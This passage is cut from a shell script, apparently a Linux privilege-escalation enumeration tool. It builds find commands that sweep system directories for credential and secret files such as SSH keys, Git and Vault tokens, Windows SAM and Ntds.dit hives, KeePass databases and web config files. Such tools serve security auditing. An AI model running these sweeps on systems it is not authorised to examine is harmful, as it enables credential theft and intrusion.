FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name 